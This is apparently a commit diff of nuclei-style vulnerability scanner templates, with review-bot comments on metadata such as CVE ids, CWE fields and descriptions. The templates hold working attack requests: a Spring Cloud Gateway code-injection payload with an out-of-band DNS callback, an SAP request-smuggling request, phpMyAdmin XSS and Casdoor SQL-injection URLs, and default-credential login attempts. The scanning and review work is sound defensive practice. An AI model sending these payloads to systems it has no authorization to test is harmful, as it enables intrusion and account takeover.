description: "The Profile Builder &#8211; User Profile & User Registration Forms WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n"
description: "The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n."
remediation: Upgrade to version 3.6.5 or later.
classification:
cve-id: CVE-2022-0653
requests:
- method: GET
@ -29,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28
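Review bot: The rewritten description ends in `3.6.1.\n\n."` — the escaped newlines from the old text were kept and a stray period was appended after them, so the double-quoted value ends with two blank lines and a lone dot. End the string at `3.6.1."` instead. The new `name` also spells the vendor `Wordpress` while the description on the same hunk and the other templates on this page use `WordPress`.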


@ -0,0 +1,59 @@
id: CVE-2022-22536
info:
name: SAP Memory Pipes(MPI) Desynchronization
author: pdteam
severity: critical
description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-22536
- https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
- https://github.com/Onapsis/onapsis_icmad_scanner
- https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
tags: cve,cve2022,sap,smuggling
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2022-22536
cwe-id: CWE-444
requests:
- raw:
- |+
GET {{sap_path}} HTTP/1.1
Host: {{Hostname}}
Content-Length: 82646
Connection: keep-alive
{{repeat("A", 82642)}}
GET / HTTP/1.1
Host: {{Hostname}}
payloads:
sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner
- /sap/admin/public/default.html
- /sap/public/bc/ur/Login/assets/corbu/sap_logo.png
unsafe: true
read-all: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- "contains(tolower(body), 'administration')" # confirms 1st path
- "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path
condition: or
- type: word
part: body
words:
- "400 Bad Request" # error in concatenated response
- "500 Internal Server Error"
- "500 Dispatching Error"
condition: or
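Review bot: `cvss-score: 10.00` is a plain scalar and is parsed as the float 10, so the trailing zeros carry no information and differ from the `7.5` and `9.8` written in the other new templates of this commit; `cvss-score: 10.0` keeps the field consistent (the same applies to `9.10` in the Cassandra template). The `# based on ...` comment on `sap_path` duplicates a URL already present in `reference`; a short note on why those two paths are probed (`# paths that exist on a default install, one HTML and one PNG, to confirm the two dsl branches`) would help a reader more than the repeated link, if that is indeed the reason.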


@ -0,0 +1,77 @@
id: CVE-2022-22947
info:
name: Spring Cloud Gateway Code Injection
author: pdteam
severity: critical
description: Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
reference:
- https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
- https://github.com/wdahlenburg/spring-gateway-demo
- https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
- https://tanzu.vmware.com/security/cve-2022-22947
tags: cve,cve2022,apache,spring,vmware,actuator,oast
requests:
- raw:
- |
POST /actuator/gateway/routes/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/{{randstr}}/**"
}
}
],
"filters": [
{
"name": "RewritePath",
"args": {
"_genkey_0": "#{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")}",
"_genkey_1": "/${path}"
}
}
],
"uri": "{{RootURL}}",
"order": 0
}
- |
POST /actuator/gateway/refresh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"predicate": "Paths: [/{{randstr}}], match trailing slash: true",
"route_id": "{{randstr}}",
"filters": [
"[[RewritePath #{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")} = /${path}], order = 1]"
],
"uri": "{{RootURL}}",
"order": 0
}
- |
DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 201
- type: word
part: header
words:
- "/routes/{{randstr}}"
- type: word
part: interactsh_protocol
words:
- "dns"
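Review bot: This new template has no `classification` block, unlike the other templates added in this commit (Cassandra, SAP, Casdoor each give `cve-id`, `cvss-metrics`, `cvss-score`, `cwe-id`); at minimum add `classification:` with `cve-id: CVE-2022-22947` under `info`. The `apache` tag also looks out of place for a Spring / VMware product: elsewhere on this page (Cassandra, Superset) `apache` denotes the vendor, so confirm it was not meant as the licence. The final DELETE request removes the route the first request created; a one-line comment above it, `# cleanup: remove the route added above`, would make that intent explicit.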


@ -4,8 +4,9 @@ info:
name: Zabbix - SAML SSO Authentication Bypass
author: For3stCo1d
severity: critical
description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
reference:
- https://support.zabbix.com/browse/ZBX-20350
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- https://github.com/1mxml/CVE-2022-23131
@ -37,3 +38,5 @@ requests:
- type: dsl
dsl:
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
# Enhanced by mp on 2022/02/28


@ -33,3 +33,5 @@ requests:
- '"uname":'
- '"upassword":'
condition: and
# Enhanced by mp on 2022/02/28


@ -1,26 +1,28 @@
id: CVE-2022-23808
info:
name: phpMyAdmin < 5.1.2 - XSS
name: phpMyAdmin < 5.1.2 - Cross-Site Scripting
author: cckuailong
severity: medium
description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.
description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
reference:
- https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
- https://github.com/dipakpanchal456/CVE-2022-23808
- https://nvd.nist.gov/vuln/detail/CVE-2022-23808
tags: cve,cve2022,phpmyadmin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-23808
cwe-id: CWE-79
tags: cve,cve2022,phpmyadmin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=\">'><script>alert(document.domain)</script>"
- "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=\">'><script>alert(document.domain)</script>"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
@ -36,3 +38,5 @@ requests:
part: body
words:
- "\">'><script>alert(document.domain)</script>"
# Enhanced by mp on 2022/02/28
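Review bot: The rewritten description drops a word: `which can allow cross-site or HTML injection` should be `which can allow cross-site scripting or HTML injection`, matching the old line above. The rest of the hunk (title, `tags` position) is layout only.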


@ -0,0 +1,38 @@
id: CVE-2022-24124
info:
name: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
author: cckuailong
severity: high
description: The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
reference:
- https://www.exploit-db.com/exploits/50792
- https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2022-24124
metadata:
product: https://casdoor.org/
shodan-query: http.title:"Casdoor"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24124
cwe-id: CWE-89
tags: cve,cve2022,casdoor,sqli,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "XPATH syntax error.*&#39"
- "casdoor"
condition: and
- type: status
status:
- 200


@ -1,13 +1,22 @@
id: CVE-2022-25369
info:
name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin addition
name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation
author: pdteam
severity: critical
reference: https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.
remediation: "Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0."
reference:
- https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369
metadata:
shodan-query: http.component:"Dynamicweb"
tags: cve,cve2022,dynamicweb,rce,unauth
classification:
cve-id: CVE-2022-25369
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-425
requests:
- method: GET
@ -33,4 +42,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by cs on 2022/02/28


@ -1,11 +1,17 @@
id: apache-superset-default-login
id: CVE-2021-44451
info:
name: Apache Superset Default Login
author: dhiyaneshDK
severity: high
reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
tags: apache, default-login
classification:
cve-id: CVE-2021-44451
requests:
- raw:
@ -57,3 +63,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/03/02
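Review bot: Changing `id: apache-superset-default-login` to `id: CVE-2021-44451` makes the template claim a CVE that the rest of the file does not test for: the name is still "Apache Superset Default Login", the first reference is a default-credentials module, the tags are `apache, default-login` with no `cve`/`cve2021`, and the matcher visible at the end of the section is a 302 on the login request. The new description (registered database-connection passwords leaked to authenticated users, fixed in 1.4.0) is a different weakness from default credentials, so a match here does not demonstrate CVE-2021-44451, and a 1.4.0 instance that still has default credentials would presumably be reported under the CVE id. Either keep `id: apache-superset-default-login` with the NVD link as a secondary reference, or split the CVE check into its own template with a matcher for the actual leak and `tags: cve,cve2021,apache,superset`. The tags value is also the only one in this commit with a space after the comma; the others write `default-login,azkaban` with none. The `requests` block continues outside the hunk.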


@ -63,4 +63,4 @@ requests:
- type: word
words:
- Apache Tomcat
- Apache Tomcat


@ -1,47 +1,55 @@
id: azkaban-default-login
info:
name: Azkaban Web Client Default Credential
author: pussycat0x
severity: high
reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=login&username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- '"session.id"'
- '"success"'
condition: and
- type: word
words:
- 'azkaban.browser.session.id'
- 'application/json'
condition: and
part: header
- type: status
status:
- 200
extractors:
- type: kval
kval:
- azkaban.browser.session.id
id: azkaban-default-login
info:
name: Azkaban Web Client Default Credential
author: pussycat0x
severity: high
description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered.
reference:
- https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
classification:
cwe-id: 255
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=login&username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- '"session.id"'
- '"success"'
condition: and
- type: word
words:
- 'azkaban.browser.session.id'
- 'application/json'
condition: and
part: header
- type: status
status:
- 200
extractors:
- type: kval
kval:
- azkaban.browser.session.id
# Enhanced by mp on 2022/03/02
# Enhanced by mp on 2022/03/02
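Review bot: `cwe-id: 255` under `classification` is a bare integer, so a YAML loader types it as an int, while other templates in this commit write the field as the string `CWE-425`/`CWE-89` and cobbler-default-login writes lowercase `cwe-id: cwe-798`; chinaunicom-default-login and both Dell iDRAC templates use the same bare form `cwe-id: 798`. Any consumer that validates, groups or joins on this field sees three representations of one identifier; the prefixed string form, `cwe-id: CWE-255`, matches the CVE templates and avoids the int/str split. On content, CWE-255 (Credentials Management Errors) is a category rather than a specific weakness, whereas the sibling default-login templates in this commit use CWE-798 (Use of Hard-coded Credentials) for the same kind of check, so `cwe-id: CWE-798` would keep them consistent.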


@ -1,10 +1,13 @@
id: chinaunicom-default-login
info:
name: Chinaunicom Modem Default Login
name: China Unicom Modem Default Login
author: princechaddha
severity: high
description: Default login credentials were discovered for a China Unicom modem.
tags: chinaunicom,default-login
classification:
cwe-id: 798
requests:
- raw:
@ -31,3 +34,5 @@ requests:
words:
- "/menu.gch"
part: header
# Enhanced by mp on 2022/03/02


@ -3,11 +3,15 @@ id: cobbler-default-login
info:
name: Cobbler Default Login
author: c-sh0
description: Cobbler default login credentials were discovered. When in /etc/cobbler/modules.conf in the [authentication] part of the "testing" module, the credential “testing:testing” is used to authenticate users.
reference:
- https://seclists.org/oss-sec/2022/q1/146
- https://github.com/cobbler/cobbler/issues/2307
- https://github.com/cobbler/cobbler/issues/2909
severity: high
tags: cobbler,default-login,api
classification:
cwe-id: cwe-798
requests:
- raw:
@ -64,3 +68,5 @@ requests:
part: body
regex:
- "(.*[a-zA-Z0-9].+==)</string></value>"
# Enhanced by mp on 2022/03/02


@ -1,9 +1,15 @@
id: dell-idrac-default-login
info:
name: Dell iDRAC6/7/8 Default login
name: Dell iDRAC6/7/8 Default Login
author: kophjager007
severity: high
description: Dell iDRAC6/7/8 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
reference:
- https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
tags: dell,idrac,default-login
classification:
cwe-id: 798
requests:
- raw:
@ -34,3 +40,5 @@ requests:
- type: word
words:
- '<authResult>0</authResult>'
# Enhanced by mp on 2022/03/02


@ -4,7 +4,12 @@ info:
name: DELL iDRAC9 Default Login
author: kophjager007,milo2012
severity: high
description: DELL iDRAC9 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
reference:
- https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
tags: dell,idrac,default-login
classification:
cwe-id: 798
requests:
- raw:
@ -33,3 +38,5 @@ requests:
part: body
words:
- '"authResult":0'
# Enhanced by mp on 2022/03/02


@ -11,9 +11,6 @@ info:
metadata:
shodan-query: http.title:"GitLab"
# Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
requests:
- raw:
- |


@ -35,14 +35,14 @@ requests:
matchers:
- type: word
words:
- "grafana_session" # Login cookie
- "grafana_session" # Login cookie
part: header
- type: word
part: body
words:
- "Logged in" # Logged in keyword
- "Logged in" # Logged in keyword
- type: status
status:
- 200
- 200


@ -6,7 +6,7 @@ info:
severity: low
tags: szhe,default-login
reference:
- https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
- https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
requests:
- raw:


@ -5,6 +5,11 @@ info:
author: dhiyaneshDK
severity: info
tags: barracuda,panel,vpn
description: The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any web browser.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
requests:
- method: GET
@ -20,3 +25,5 @@ requests:
- type: word
words:
- 'Barracuda SSL VPN'
# Enhanced by mp on 2022/03/01
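Review bot: The new `classification` block assigns `cwe-id: CWE-200` (Exposure of Sensitive Information to an Unauthorized Actor) to a template whose visible matcher is the literal `'Barracuda SSL VPN'` in the response body, i.e. a product fingerprint at `severity: info` with `cvss-score: 0.0`; the Bitrix24 panel template in this commit gets the same combination. A reachable vendor login page is not a CWE-200 weakness, and attaching a weakness id to panel detections inflates any downstream report that groups or counts findings by CWE. If classification is wanted on panel templates, the `cvss-metrics` vector with `cvss-score: 0.0` already carries the no-impact intent and the `cwe-id` line can be dropped. The added `description` is a product blurb rather than a statement of what a match means; `description: Detects the Barracuda SSL VPN web login page.` would be more useful to an operator triaging results. The `requests` block and any earlier matchers are outside this hunk.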


@ -5,6 +5,11 @@ info:
author: juicypotato1
severity: info
tags: panel,bitrix,login
description: Bitrix24 is a unified work space that places a complete set of business tools into a single, intuitive interface.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
requests:
- method: GET
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/01


@ -0,0 +1,26 @@
id: casdoor-login
info:
name: Casdoor Login Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"Casdoor"
tags: panel,casdoor
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Casdoor</title>"
- type: status
status:
- 200
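Review bot: The new casdoor-login template has no `description`, so a consumer of the result learns only the name "Casdoor Login Panel"; the other new panel templates in this commit that add one (digitalrebar-login, sitefinity-login) show the convention, while directum-login, issabel-login, librenms-login, ocs-inventory-login and subrion-login omit it in the same way. A one-liner such as `description: Detects the Casdoor login page served at /login.` is enough and keeps the info-level panel templates uniform.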


@ -0,0 +1,31 @@
id: digitalrebar-login
info:
name: RackN Digital Rebar Login Panel
author: c-sh0
severity: info
description: RackN Digital Rebar provision UI detection
reference:
- https://docs.rackn.io/
- https://docs.rackn.io/en/latest/doc/server.html#ports
tags: rackn,digitalrebar,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/ui"
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Digital Rebar'


@ -0,0 +1,27 @@
id: directum-login
info:
name: Directum Login Panel
author: pikpikcu
severity: info
metadata:
fofa-query: title="Directum"
tags: directum,panel
requests:
- method: GET
path:
- "{{BaseURL}}/Login.aspx"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DIRECTUM Login"
- "Directum Login"
condition: or
- type: status
status:
- 200


@ -4,6 +4,8 @@ info:
name: Detect Gitlab
author: ehsahil
severity: info
metadata:
shodan-query: http.title:"GitLab"
tags: panel,gitlab
requests:


@ -0,0 +1,27 @@
id: issabel-login
info:
name: Issabel Login Panel
author: pikpikcu
severity: info
metadata:
fofa-query: title="Issabel"
tags: issabel,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<a href="http://www.issabel.org"'
- '<title>Issabel - Login page</title>'
condition: or
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: librenms-login
info:
name: LibreNMS Login Panel
author: pikpikcu
severity: info
metadata:
fofa-query: title="librenms"
tags: librenms,panel
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>LibreNMS</title>'
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: ocs-inventory-login
info:
name: OCS Inventory Login Panel
author: pikpikcu
severity: info
metadata:
fofa-query: title="OCS Inventory"
tags: ocs-inventory,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>OCS Inventory</title>'
- type: status
status:
- 200


@ -3,6 +3,7 @@ id: sitefinity-login
info:
name: Sitefinity Login
author: dhiyaneshDK
description: This template identifies the Sitefinity login page.
severity: info
reference: https://www.exploit-db.com/ghdb/6722
tags: panel,sitefinity
@ -20,3 +21,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/28


@ -0,0 +1,32 @@
id: subrion-login
info:
name: Subrion Admin Login Panel
author: princechaddha
severity: info
tags: panel,subrion
requests:
- method: GET
path:
- "{{BaseURL}}/panel"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h1>Welcome to<br>Subrion Admin Panel</h1>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "Subrion CMS ([a-z0-9.]+)</a><br>"


@ -31,7 +31,7 @@ requests:
headers:
Range: "bytes=0-3000"
max-size: 2000 # Size in bytes - Max Size to read from server response
max-size: 2000 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: regex


@ -40,7 +40,7 @@ requests:
- "sql.z"
- "sql.tar.z"
max-size: 500 # Size in bytes - Max Size to read from server response
max-size: 500 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: binary
@ -66,4 +66,4 @@ requests:
- type: status
status:
- 200
- 200


@ -1,24 +0,0 @@
id: exposed-metrics
info:
name: Exposed metrics
author: dhiyaneshDK
severity: low
reference: https://hackerone.com/reports/1026196
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/metrics"
matchers-condition: and
matchers:
- type: word
words:
- 'cpu_seconds_total'
condition: and
- type: status
status:
- 200
